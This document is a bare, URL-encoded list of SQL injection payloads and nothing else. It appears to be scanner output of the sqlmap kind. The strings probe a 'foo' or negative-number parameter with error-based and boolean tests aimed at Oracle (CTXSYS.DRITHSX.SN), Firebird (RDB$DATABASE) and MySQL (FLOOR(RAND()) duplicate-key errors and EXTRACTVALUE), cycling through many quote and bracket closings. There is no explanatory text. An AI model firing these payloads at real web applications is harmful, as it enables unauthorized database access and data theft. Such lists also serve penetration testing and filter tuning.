foo%29%20WHERE%206756%3D6756%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29 foo%27%29%20WHERE%202350%3D2350%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29 foo%27%20WHERE%204942%3D4942%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29 foo%22%20WHERE%206707%3D6707%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29 foo%27%20%7C%7C%20%28SELECT%204860%20FROM%20DUAL%20WHERE%202859%3D2859%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%206986%20WHERE%204362%3D4362%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%203137%20FROM%20DUAL%20WHERE%205326%3D5326%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20%29 foo%20%2B%20%28SELECT%203729%20WHERE%206307%3D6307%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20%29 foo%27%20%2B%20%28SELECT%20%27ToRP%27%20FROM%20DUAL%20WHERE%202249%3D2249%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27OmrP%27%20WHERE%204538%3D4538%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20%23 foo%29%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29 foo%27%29%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29 foo%27%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29 foo%22%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29 foo%29%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%282811%3D2811 foo%29%29%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%285662%3D5662 foo%29%29%29%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%28%289994%3D9994 foo%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29 foo%27%29%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%27odDo%27%3D%27odDo foo%27%29%29%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%28%27jheL%27%3D%27jheL foo%27%29%29%29%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%28%28%27XMOh%27%3D%27XMOh foo%27%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%27tYsn%27%3D%27tYsn foo%27%29%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%27EqWv%27%20LIKE%20%27EqWv foo%27%29%29%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%28%27pesL%27%20LIKE%20%27pesL foo%27%29%29%29%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%28%28%27EanP%27%20LIKE%20%27EanP foo%27%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%27uKJo%27%20LIKE%20%27uKJo foo%22%29%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%22EdUR%22%3D%22EdUR foo%22%29%29%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%28%22lZbo%22%3D%22lZbo foo%22%29%29%29%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%28%28%22Nogi%22%3D%22Nogi foo%22%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%22epvv%22%3D%22epvv foo%22%29%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%22voQT%22%20LIKE%20%22voQT foo%22%29%29%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%28%22pBuz%22%20LIKE%20%22pBuz foo%22%29%29%29%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%28%28%22MPMz%22%20LIKE%20%22MPMz foo%22%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%22xPlz%22%20LIKE%20%22xPlz foo%29%20WHERE%209263%3D9263%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29 foo%27%29%20WHERE%206564%3D6564%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29 foo%27%20WHERE%207565%3D7565%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29 foo%22%20WHERE%205737%3D5737%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29 foo%27%20%7C%7C%20%28SELECT%207578%20FROM%20DUAL%20WHERE%207524%3D7524%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%208810%20WHERE%206210%3D6210%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%206089%20FROM%20DUAL%20WHERE%206789%3D6789%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20%29 foo%20%2B%20%28SELECT%206747%20WHERE%206182%3D6182%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20%29 foo%27%20%2B%20%28SELECT%20%27HRiU%27%20FROM%20DUAL%20WHERE%201931%3D1931%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27bqJM%27%20WHERE%209616%3D9616%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%201237%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%201237%20WHEN%201237%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20%23 -9840%29%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -5677%27%29%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -5175%27%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -5680%22%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -7895%29%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%284628%3D4628 -8006%29%29%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%287077%3D7077 -5207%29%29%29%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%281876%3D1876 -6710%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -6045%27%29%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27yWeJ%27%3D%27yWeJ -6971%27%29%29%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27sMlQ%27%3D%27sMlQ -3095%27%29%29%29%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27mVwX%27%3D%27mVwX -8462%27%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27oJcy%27%3D%27oJcy -8790%27%29%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27nxSi%27%20LIKE%20%27nxSi -7464%27%29%29%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27csKq%27%20LIKE%20%27csKq -1400%27%29%29%29%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27tOHP%27%20LIKE%20%27tOHP -6226%27%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27Vkts%27%20LIKE%20%27Vkts -8353%22%29%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%22AXtX%22%3D%22AXtX -7751%22%29%29%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%22gzgB%22%3D%22gzgB -5584%22%29%29%29%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%22NFTk%22%3D%22NFTk -4670%22%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22weqc%22%3D%22weqc -6508%22%29%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%22pydn%22%20LIKE%20%22pydn -8164%22%29%29%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%22SIEL%22%20LIKE%20%22SIEL -6820%22%29%29%29%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%22PPcC%22%20LIKE%20%22PPcC -4758%22%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22xBuj%22%20LIKE%20%22xBuj -1052%29%20WHERE%201477%3D1477%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -1301%27%29%20WHERE%204124%3D4124%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -8977%27%20WHERE%205729%3D5729%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -3667%22%20WHERE%205636%3D5636%20OR%20%28SELECT%205176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285176%3D5176%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 foo%29%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29 foo%27%29%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29 foo%27%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29 foo%22%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29 